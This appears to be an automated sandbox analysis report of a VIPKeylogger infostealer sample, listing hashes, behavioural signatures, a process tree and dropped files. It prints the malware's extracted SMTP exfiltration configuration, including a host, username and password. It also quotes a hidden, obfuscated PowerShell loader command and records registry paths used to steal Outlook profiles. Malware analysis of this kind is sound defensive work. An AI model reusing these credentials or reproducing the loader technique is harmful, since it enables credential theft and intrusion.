Analysis
-
max time kernel
148s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06/11/2024, 14:31
Static task
static1
Behavioral task
behavioral1
Sample
2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
otherworldly.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
otherworldly.ps1
Resource
win10v2004-20241007-en
General
-
Target
2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe
-
Size
657KB
-
MD5
8b1f6297418f5bf0ac5aadee8483365a
-
SHA1
19c4af87dce3d41ee970c205f49c34e05610dedd
-
SHA256
2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa
-
SHA512
202ec5769889bc9618498e6a64d59b0ef0a66e3fec75652fe2b9a0db70bc11e276631f1dc7f2237103db955ce6a1b106732335bb9bfa4ed0086b345d6066593d
-
SSDEEP
12288:v486zV9AmtTec4Hd69GRs5ljIW0ep9Rr2M/iTGYqWofv1zSFXMhuV+7+bp:v16zDADsuklECyCiuW095ugcp
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.turktav.com - Port:
587 - Username:
[email protected] - Password:
)d!s~MV@X;!M - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1488 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 22 3328 msiexec.exe 24 3328 msiexec.exe 26 3328 msiexec.exe 28 3328 msiexec.exe 32 3328 msiexec.exe 35 3328 msiexec.exe 37 3328 msiexec.exe 41 3328 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 drive.google.com 22 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3328 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1488 powershell.exe 3328 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Gallinipper\gid.ful 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\thermels\dekaterendes.ini 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe File opened for modification C:\Windows\Fonts\choanosome\nitrosyl.ini 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe File opened for modification C:\Windows\resources\0409\storewide.Riv 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 3328 msiexec.exe 3328 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3328 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1488 powershell.exe Token: SeIncreaseQuotaPrivilege 1488 powershell.exe Token: SeSecurityPrivilege 1488 powershell.exe Token: SeTakeOwnershipPrivilege 1488 powershell.exe Token: SeLoadDriverPrivilege 1488 powershell.exe Token: SeSystemProfilePrivilege 1488 powershell.exe Token: SeSystemtimePrivilege 1488 powershell.exe Token: SeProfSingleProcessPrivilege 1488 powershell.exe Token: SeIncBasePriorityPrivilege 1488 powershell.exe Token: SeCreatePagefilePrivilege 1488 powershell.exe Token: SeBackupPrivilege 1488 powershell.exe Token: SeRestorePrivilege 1488 powershell.exe Token: SeShutdownPrivilege 1488 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeSystemEnvironmentPrivilege 1488 powershell.exe Token: SeRemoteShutdownPrivilege 1488 powershell.exe Token: SeUndockPrivilege 1488 powershell.exe Token: SeManageVolumePrivilege 1488 powershell.exe Token: 33 1488 powershell.exe Token: 34 1488 powershell.exe Token: 35 1488 powershell.exe Token: 36 1488 powershell.exe Token: SeDebugPrivilege 3328 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3328 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 756 wrote to memory of 1488 756 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe 86 PID 756 wrote to memory of 1488 756 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe 86 PID 756 wrote to memory of 1488 756 2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe 86 PID 1488 wrote to memory of 3328 1488 powershell.exe 97 PID 1488 wrote to memory of 3328 1488 powershell.exe 97 PID 1488 wrote to memory of 3328 1488 powershell.exe 97 PID 1488 wrote to memory of 3328 1488 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe"C:\Users\Admin\AppData\Local\Temp\2d3d809456f1b8181541bafb523c4ec83b4c4a4183378da9d9bd7b8d23aa79aa.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Bogdebat=Get-Content -raw 'C:\Users\Admin\AppData\Local\Mixende\Klausuleringerne\otherworldly.Kas';$Urfugl=$Bogdebat.SubString(55559,3);.$Urfugl($Bogdebat)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3328
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
216KB
MD52ac7ea4021c619b4ad5988d606e86816
SHA1a6001b8ddc38bbafcef1f0606e0c14212d8f87b9
SHA2568046ae03bf736ccc52c8af323fa997c4b90b97ba39b90cca7c3afe028be5f20a
SHA512f488ab969395c452abf838074163bcb81575d58967dba5e728c12daeccda2d6421959aefb9993f7d7238f5df9dbaabdea81c676431fd62bb590f683ca85739b8
-
Filesize
54KB
MD5df1cc5262f98c2cf7f51cc5ed85528d7
SHA13d9b2293d194ce127b040b28099591b197b18978
SHA256c547c1878b7c38fddc357939a52c840910f36b31c6a720af9a125c91eaaed735
SHA5128612721272dc45dc7b3ddad450ac8f66c48a458d249ff0c1adc5582f10daa644a05511c4837931490677c7c6b9d495d905bc610e4abd62b97c083804747c6b82
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82